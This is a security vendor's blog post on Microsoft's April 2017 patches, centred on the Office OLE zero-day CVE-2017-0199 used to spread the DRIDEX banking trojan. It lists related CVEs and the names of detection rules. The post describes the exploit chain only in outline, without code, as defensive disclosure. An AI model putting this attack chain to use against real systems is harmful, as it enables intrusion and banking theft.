• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Vulnerabilities   »   April Patch Tuesday: Microsoft Patches Office Vulnerability Used in Zero-Day Attacks

April Patch Tuesday: Microsoft Patches Office Vulnerability Used in Zero-Day Attacks

  • Posted on:April 12, 2017 at 8:57 am
  • Posted in:Vulnerabilities
  • Author:
    Ronaldo Mangahas (Technical Communications)
0

One of the major updates for this month’s Patch Tuesday addresses CVE-2017-0199, a zero-day remote code execution vulnerability that allowed attackers to exploit a flaw that exists in the Windows Object Linking and Embedding (OLE) interface of Microsoft Office. This flaw is currently being exploited by the notorious DRIDEX banking trojan.

Threat actors leveraging this vulnerability do so via a spam campaign in which the attacker sends an email with an embedded Microsoft Word document to a targeted user. When the user opens the attached document, the hidden exploit code connects to a remote server that fetches malicious files, which are DRIDEX variants(detected by Trend Micro as TSPY_DRIDEX.SLP, TROJ_CVE20170199.B and TROJ_CVE20170199.C).

The following DPI rules from Trend Micro Deep Security and Vulnerability Protection address this critical vulnerability:

  • 1008285-Microsoft Word Remote Code Execution Vulnerability (CVE-2017-0199)
  • 1008295-Restrict Microsoft Word RTF File With Embedded OLE2link Object (CVE-2017-0199)
  • 1008297-Identified Suspicious RTF File With Obfuscated Powershell Execution (CVE-2017-0199)

In addition to CVE-2017-0199, updates were made to the Hyper-V component of Windows Server, designed to address the following Critical vulnerabilities: CVE-2017-0162, CVE-2017-0163, CVE-2017-0180 and CVE-2017-0181, which are remote code execution vulnerabilities that trigger when the Windows Hyper-V Network Switch on a host server fails to properly validate input from an authenticated user on a guest operating system. Attackers will be able to exploit these vulnerabilities by running a specially crafted application on a guest operating system that could cause arbitrary code execution on the Hyper-V host operating system.

Microsoft’s round of updates also contains cumulative ones which address three Critical vulnerabilities (CVE-2017-0201, CVE-2017-0202 and CVE-2017-0158) for Microsoft Internet Explorer, and another three (CVE-2017-0093, CVE-2017-0200 and CVE-2017-0205) for Microsoft Edge.

In sync with Microsoft, Adobe also released their own updates, with the most important ones being APSB17-10, which addresses critical vulnerabilities in Adobe Flash Player; and APSB17-11, which resolves critical vulnerabilities in Adobe Acrobat and Reader. The vulnerabilities could allow a potential attacker to take control of affected systems.

The following vulnerabilities were disclosed via Trend Micro’s Zero Day Initiative (ZDI):

  • CVE-2017-0155
  • CVE-2017-0158
  • CVE-2017-3019
  • CVE-2017-3020
  • CVE-2017-3021
  • CVE-2017-3022
  • CVE-2017-3023
  • CVE-2017-3028
  • CVE-2017-3029
  • CVE-2017-3031
  • CVE-2017-3032
  • CVE-2017-3033
  • CVE-2017-3036
  • CVE-2017-3034
  • CVE-2017-3035
  • CVE-2017-3042
  • CVE-2017-3043
  • CVE-2017-3044
  • CVE-2017-3045
  • CVE-2017-3046
  • CVE-2017-3047
  • CVE-2017-3048
  • CVE-2017-3049
  • CVE-2017-3050
  • CVE-2017-3051
  • CVE-2017-3052
  • CVE-2017-3053
  • CVE-2017-3055
  • CVE-2017-3056
  • CVE-2017-3057
  • CVE-2017-3058
  • CVE-2017-3059
  • CVE-2017-3060
  • CVE-2017-3062

In addition to the DPI rules that protect users from the CVE-2017-0199 vulnerability, Trend Micro Deep Security and Vulnerability Protection also protect user systems from any threats that may target these Microsoft vulnerabilities:

  • 1008274-Microsoft Windows Multiple Security Vulnerabilities (CVE-2017-0155, CVE-2017-0160, CVE-2017-0165, CVE-2017-0167, CVE-2017-0188, CVE-2017-0189, CVE-2017-0211, CVE-2017-0156)
  • 1008275-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2017-0158)
  • 1008278-Microsoft LDAP Elevation Of Privilege Vulnerability (CVE-2017-0166)
  • 1008282-Microsoft Windows ATMFD.dll Information Disclosure Vulnerability (CVE-2017-0192)
  • 1008283-Microsoft Office Memory Corruption Vulnerability (CVE-2017-0194)
  • 1008284-Microsoft Office DLL Loading Vulnerability Over Network Share (CVE-2017-0197)
  • 1008286-Microsoft Edge Memory Corruption Vulnerability (CVE-2017-0200)
  • 1008287-Microsoft Internet Explorer Scripting Engine Memory Corruption Vulnerability (CVE-2017-0201)
  • 1008288-Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2017-0202)
  • 1008290-Microsoft Edge Memory Corruption Vulnerability (CVE-2017-0205)
  • 1008291-Microsoft Edge Scripting Engine Information Disclosure Vulnerability (CVE-2017-0208)
  • 1008292-Microsoft Office DLL Loading Vulnerability Over WebDAV (CVE-2017-0197)
  • 1008294-Microsoft Internet Explorer Elevation Of Privilege Vulnerability (CVE-2017-0210)

TippingPoint customers are protected from attacks exploiting these vulnerabilities via these MainlineDV filters:

  • 27423: HTTP: Microsoft Template with an Embedded Shockwave Flash Object
  • 27719: HTTP: Microsoft Internet Explorer VBScript Recordset Use-After-Free Vulnerability
  • 27723: HTTP: Microsoft Edge SVG xlink Type Confusion Vulnerability
  • 27724: HTTP: Microsoft Internet Explorer Stylesheet Type Confusion Vulnerability
  • 27725: HTTP: Microsoft Edge Render Format Type Confusion Vulnerability
  • 27726: HTTP: Microsoft Word RTF objautlink Memory Corruption Vulnerability
  • 27727: HTTP: Microsoft Windows DDI Out-of-Bounds Write Vulnerability
  • 27728: HTTP: Microsoft Excel XML Memory Corruption Vulnerability
  • 27729: HTTP: Microsoft Windows Win32k KASLR Information Disclosure Vulnerability
  • 27731: HTTP: Microsoft Windows GDI Out-of-Bounds Write Vulnerability
  • 27732: HTTP: Microsoft Windows DDI Out-of-Bounds Write Vulnerability
  • 27733: HTTP: Microsoft Windows Adobe Type-1 Font ATMFD.DLL Memory Corruption Vulnerability
  • 27736: HTTP: Microsoft OneNote DLL Hijacking Vulnerability
  • 27737: HTTP: Microsoft Edge Chakra Information Disclosure Vulnerability
  • 27739: HTTP: Microsoft Windows IEETWCollector Privilege Escalation Vulnerability
  • 27740: HTTP: Microsoft .NET WMI Memory Corruption Vulnerability
  • 27841: HTTP: RTF File Implementing objautlink and URL Monikers
  • 27842: HTTP: Suspicious Obfuscated Powershell Execution
  • 27850:HTTPS: TSPY_DRIDEX.SLP Checkin

Users with Trend Micro Home Network Security are protected via the following signature:

  • 1133594 FILE Microsoft Outlook Remote Code Execution Vulnerability (CVE-2017-0199)
Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»
Tags: Patch Tuesday

Security Predictions for 2020

  • Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats.
    Read our security predictions for 2020.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • Our New Blog
  • How Unsecure gRPC Implementations Can Compromise APIs, Applications
  • XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits
  • August Patch Tuesday Fixes Critical IE, Important Windows Vulnerabilities Exploited in the Wild
  • Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts

Popular Posts

Sorry. No data so far.

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.